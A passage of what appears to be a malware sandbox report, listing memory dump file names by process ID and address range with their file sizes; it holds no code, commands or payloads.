                                                                                                                    • memory/1136-154-0x000002097BC70000-0x000002097BCE0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/1184-184-0x000002756A980000-0x000002756A9F0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/1184-312-0x000002756AA60000-0x000002756AAD0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/1184-311-0x000002756A910000-0x000002756A95B000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      300KB

                                                                                                                    • memory/1384-316-0x0000018544B20000-0x0000018544B90000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/1384-186-0x0000018544A40000-0x0000018544AB0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/1412-168-0x0000015A777A0000-0x0000015A77810000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/1744-328-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/1880-174-0x0000028AA8230000-0x0000028AA82A0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/1968-331-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/2064-116-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/2112-249-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/2240-149-0x000001BCA83B0000-0x000001BCA8420000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/2240-144-0x000001BCA7780000-0x000001BCA77CB000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      300KB

                                                                                                                    • memory/2260-143-0x000001D032B90000-0x000001D032C00000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/2376-347-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/2420-188-0x000002CB13240000-0x000002CB132B0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/2420-319-0x000002CB13770000-0x000002CB137E0000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/2436-322-0x000001B2E9620000-0x000001B2E9690000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/2436-190-0x000001B2E9200000-0x000001B2E9270000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/2464-119-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/2464-142-0x00000000047E8000-0x00000000048E9000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      1.0MB

                                                                                                                    • memory/2464-146-0x0000000004950000-0x00000000049AC000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      368KB

                                                                                                                    • memory/2704-159-0x0000025033C90000-0x0000025033D00000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/2732-120-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/2732-139-0x0000000000E40000-0x0000000000E41000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/2732-126-0x0000000000900000-0x0000000000901000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/2732-129-0x0000000000E10000-0x0000000000E11000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/2732-173-0x000000001B520000-0x000000001B522000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/2732-135-0x0000000000E20000-0x0000000000E3C000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      112KB

                                                                                                                    • memory/2932-364-0x0000000000402F68-mapping.dmp
                                                                                                                    • memory/3092-152-0x00000131953B0000-0x0000013195420000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/3092-324-0x0000013195700000-0x0000013195770000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/4012-161-0x00000221C8BE0000-0x00000221C8C50000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/4012-131-0x00007FF7038B4060-mapping.dmp
                                                                                                                    • memory/4216-363-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4316-357-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4356-193-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/4356-191-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4364-345-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4388-199-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4388-195-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4464-203-0x0000000000C60000-0x0000000000C62000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4464-200-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4484-306-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4500-361-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4524-355-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4524-338-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4536-352-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4608-208-0x000001EB18B00000-0x000001EB18B70000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      448KB

                                                                                                                    • memory/4608-207-0x000001EB18840000-0x000001EB1888B000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      300KB

                                                                                                                    • memory/4608-250-0x000001EB1B100000-0x000001EB1B201000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      1.0MB

                                                                                                                    • memory/4608-204-0x00007FF7038B4060-mapping.dmp
                                                                                                                    • memory/4724-209-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4724-211-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      88KB

                                                                                                                    • memory/4740-358-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4760-224-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4760-214-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4796-217-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4796-225-0x0000000002030000-0x0000000002032000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4816-220-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4816-226-0x0000000002F90000-0x0000000002F92000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4816-241-0x0000000002F95000-0x0000000002F97000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4816-240-0x0000000002F94000-0x0000000002F95000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4816-239-0x0000000002F92000-0x0000000002F94000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4892-231-0x0000000002820000-0x0000000002822000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4892-242-0x0000000002825000-0x0000000002826000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4892-227-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/4892-238-0x0000000002822000-0x0000000002824000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4964-235-0x0000000000130000-0x000000000013D000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      52KB

                                                                                                                    • memory/4964-232-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5096-246-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5096-276-0x0000000001854000-0x0000000001855000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/5096-251-0x0000000001850000-0x0000000001852000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/5160-282-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5184-252-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5196-260-0x0000000000B80000-0x0000000000B92000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      72KB

                                                                                                                    • memory/5196-335-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5196-253-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5196-259-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/5284-256-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5292-283-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5300-362-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5320-287-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5336-346-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5416-351-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5420-354-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5460-356-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5492-360-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5496-359-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5496-342-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5512-313-0x0000000004CB0000-0x0000000004D0C000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      368KB

                                                                                                                    • memory/5512-291-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5512-309-0x0000000004AC2000-0x0000000004BC3000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      1.0MB

                                                                                                                    • memory/5528-353-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5564-348-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5580-263-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5672-264-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5780-349-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5784-341-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5828-269-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/5936-343-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/6004-273-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/6056-344-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/6128-325-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/6140-350-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/6172-365-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/6284-366-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/6344-367-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/6424-368-0x0000000000000000-mapping.dmp
                                                                                                                    • memory/6508-369-0x0000000000000000-mapping.dmp